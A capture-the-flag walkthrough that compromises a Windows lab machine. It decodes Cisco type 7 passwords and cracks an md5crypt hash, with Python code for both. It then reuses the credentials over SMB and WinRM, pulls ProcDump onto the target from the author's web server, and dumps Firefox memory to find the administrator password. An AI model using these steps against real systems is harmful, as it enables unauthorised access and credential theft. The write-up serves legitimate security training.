As usual, let's start with nmap:

nmap -sV -sC -p-

Open a browser and go to

Click on Login as guest

Click on Attachment

Notice that the conversation was started by user Hazard

Looks like we may have found some credentials.

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Let's do some password cracking. If we google "password cracking type 7", we find a useful website called



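Type 7 is not a hash at all but a fixed-key XOR, which is why a website can reverse it instantly while the type 5 enable secret needs a real cracking run. The decoder below is an added example (not code from the original post) that applies that XOR to the two `password 7` lines shown in the config above; the config text, the regex and the function names are mine.

```python
import re

# Fixed, public XOR key that Cisco IOS uses for "password 7" strings.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def decode_type7(encoded: str) -> str:
    """Reverse Cisco type 7 obfuscation.

    Layout: two decimal digits (offset into XLAT; IOS emits 00-15) followed
    by hex byte pairs; byte i is XORed with XLAT[(offset + i) % len(XLAT)].
    No secret is involved, so this is encoding, not encryption.
    """
    encoded = encoded.strip()
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("not a type 7 string: %r" % encoded)
    offset = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    return "".join(chr(b ^ XLAT[(offset + i) % len(XLAT)])
                   for i, b in enumerate(body))

def encode_type7(plain: str, offset: int = 2) -> str:
    """Forward direction, to show the transform is a plain XOR round trip."""
    body = bytes(ord(c) ^ XLAT[(offset + i) % len(XLAT)]
                 for i, c in enumerate(plain))
    return "%02d%s" % (offset, body.hex().upper())

# Lines carrying a type 7 string: "[username] <name> ... password 7 <hex>".
_TYPE7_LINE = re.compile(
    r"^\s*(?:username\s+)?(\S+).*?\bpassword 7 ([0-9A-Fa-f]+)", re.M)

def type7_credentials(config: str) -> dict:
    """Map each account named in a config to its decoded type 7 password."""
    return {name: decode_type7(hexstr)
            for name, hexstr in _TYPE7_LINE.findall(config)}

# Constructed sample: the three lines from the attachment. The "secret 5"
# line is an md5crypt hash, so it is deliberately not matched.
SAMPLE_CONFIG = """\
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for name, pw in type7_credentials(SAMPLE_CONFIG).items():
        ok = decode_type7(encode_type7(pw)) == pw
        print("%s -> %s (round trip ok: %s)" % (name, pw, ok))
```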
Finally, we want to crack the enable secret, $1$pdQG$o8nrSzsGXeaduXrjlvKc91.

To do that, let's use hashcat.

Go to the Downloads folder, for instance, and create a new text file there called hashed.txt. Paste your hash into it using nano.

Now run:

hashcat -m 500 hashed.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

Wait until it finishes the initialization:

When the initialization is done you should get the following:

Type s to get the status.

This might take a few minutes. The status below tells us the estimated time is 21 minutes. Just wait.

After a few minutes we get the password: stealth1agent


Hashcat assigns each algorithm a number, or "hash mode". MD5, for instance, was assigned hash mode 0.

-m 0 tells hashcat that we are going to crack plain MD5 hashes.

-m 500 is for md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5), which matches the $1$ prefix of our enable secret.

There are many different numbers; check out the full list here:
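To see what mode 500 actually computes, here is an added example (not code from the original post or from hashcat) implementing md5crypt in pure Python and checking candidates against the enable secret from the config; the mini wordlist and function names are constructed for the example. The 1000-round schedule is the reason this run takes minutes where mode 0 would take seconds.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _to64(value: int, count: int) -> str:
    """Emit `count` characters from the crypt alphabet, low 6 bits first."""
    return "".join(ITOA64[(value >> (6 * k)) & 0x3F] for k in range(count))

def md5crypt(password: str, salt: str) -> str:
    """FreeBSD md5crypt, the "$1$" scheme behind Cisco 'enable secret 5'."""
    pw, sl = password.encode(), salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    for n in range(len(pw), 0, -16):        # one byte of alt per password byte
        ctx.update(alt[:min(16, n)])
    n = len(pw)
    while n:                                 # historical bit-walk over len(pw)
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):                    # fixed 1000-round stretching
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(sl)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in groups) + _to64(final[11], 2)
    return "$1$%s$%s" % (sl.decode(), enc)

def check_md5crypt(candidate: str, hash_string: str) -> bool:
    """True if `candidate` hashes to `hash_string` ("$1$<salt>$<22 chars>")."""
    if not hash_string.startswith("$1$"):
        raise ValueError("not an md5crypt hash: %r" % hash_string)
    salt = hash_string[3:].split("$", 1)[0]
    return hmac.compare_digest(md5crypt(candidate, salt), hash_string)

def crack(hash_string: str, wordlist):
    """Tiny stand-in for 'hashcat -m 500': first word that matches, or None."""
    return next((w for w in wordlist if check_md5crypt(w, hash_string)), None)

# The enable secret from the leaked config and a constructed mini wordlist.
ENABLE_SECRET = "$1$pdQG$o8nrSzsGXeaduXrjlvKc91"
MINI_WORDLIST = ["password", "cisco", "admin123", "stealth1agent"]

if __name__ == "__main__":
    print(crack(ENABLE_SECRET, MINI_WORDLIST))
```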

Now let's turn to SMB. Port 445 is open, which is SMB.

smbclient -L

SMB authentication always requires a username. If you don't specify one, it will use your VM username by default. When prompted for a password, just press Enter.

OK, that didn't work: we were not able to get a list of the available shares.

Recap on credentials found so far:

smbclient -L -U hazard

For the password, I tried all the passwords we found above, and stealth1agent worked!

I checked all the shares available, but access is denied:

smbclient \\\\\\ADMIN$ -U hazard
smbclient \\\\\\C$ -U hazard
smbclient \\\\\\IPC$ -U hazard

Now we do have the credentials for one of the users.



Let's use lookupsid from impacket. This might help us enumerate more users.

locate lookupsid

The one we need is:


cd /usr/share/doc/python3-impacket/examples


This tells us that we need to use the following format:

python3 username:password@targetIP
python3 Hazard:stealth1agent@

There is another user called chase.


Let's use evil-winrm (WinRM stands for Windows Remote Management).

First we need to install it. Open a brand new command prompt and type the following commands.

Start with the dependencies:

sudo gem install winrm winrm-fs stringio

Now we need to install git:

sudo apt install git

We need to clone this git repository:

sudo git clone

Now let's change directory:

cd evil-winrm

Now we can connect to the target using:

./evil-winrm.rb -i -u chase 

When prompted for the password, enter:


We are in!

cd C:\Users\Chase\Desktop
cat user.txt


Congratulations! You got the flag!

Note that there is also a todo.txt on the desktop:

cat todo.txt

Now let's look for the root flag:

cd C:\Users\Administrator

Access is denied. So we need to escalate our privileges.

Privilege Escalation

Let's see what processes are running:


ps stands for Process Status.

get-process firefox

Perhaps Chase is using Firefox to login to the Issues portal? We have control over the process so we could potentially do a process dump and perhaps find some passwords in it?

Let's use ProcDump, which can dump a process's memory. From your VM, go to and click on Download ProcDump.

Once downloaded to your VM, open a new command prompt and type:

cd Downloads


We now have procdump64.exe in our Downloads folder

From this Downloads folder, we are going to create a small webserver on our VM using:

sudo python3 -m http.server 8080

Make sure you stay in the Downloads folder.

Now we have a web server running on our VM on port 8080.

Do not close this window! Otherwise your web server will be shut down.

Let's check that our web server is working by opening our web browser and typing:

The IP of my VM is, yours will be different. If you don't know the IP of your VM, open a new command prompt and type ifconfig

OK, now that our web server is working, we are going to get the target machine to go to it and retrieve procdump64.exe.

To do that, go back to the target machine. Make sure you are in C:\Users\Chase\Desktop using:

cd C:\Users\Chase\Desktop

Now let's fetch procdump64.exe from our web server:

wget "" -outfile "procdump64.exe"


We successfully downloaded procdump64.exe to the target machine!

get-process firefox

I am now going to pick one of the process IDs; here I am picking the first one below, with process ID 380. Your process ID will be different.

I want to create a process dump of the process ID 380 (Firefox). To do that I am using the following command:

.\procdump64.exe -ma 380 firefox.dmp

The -ma flag dumps the full memory of the Firefox process.

firefox.dmp will be the name of my dump file.

The first time you use this tool you need to accept the EULA by adding -accepteula:

.\procdump64.exe -ma 380 firefox.dmp -accepteula


Now that we have the dump, we need to download strings.exe.

From your VM, go to

Click on Download Strings

cd Downloads
ls has been downloaded to your VM


Type n and enter


strings.exe is now in our Downloads folder, meaning that it is also still available from our web server:

Now we need to get strings.exe downloaded onto the target machine. To do this, go back to the target machine and type:

wget "" -outfile "strings.exe"


Great! strings.exe is now on the target machine.

We are going to use strings.exe to search the dump file (firefox.dmp) for any strings that contain the word "password". The idea is to find the administrator's password in the Firefox dump.

To do that, type:

./strings.exe firefox.dmp | findstr /i password

This will take a while.

We find the following credentials in the dump:



Now that we have the credentials for the administrator account, we can use evil-winrm again, but this time log in as administrator. From your VM, open a new command prompt window and type:

cd Downloads
cd evil-winrm

./evil-winrm.rb -i -u administrator

Enter the password:


We are in!

cd C:\Users\Administrator\Desktop

cat root.txt


Congratulations! You got the root flag!
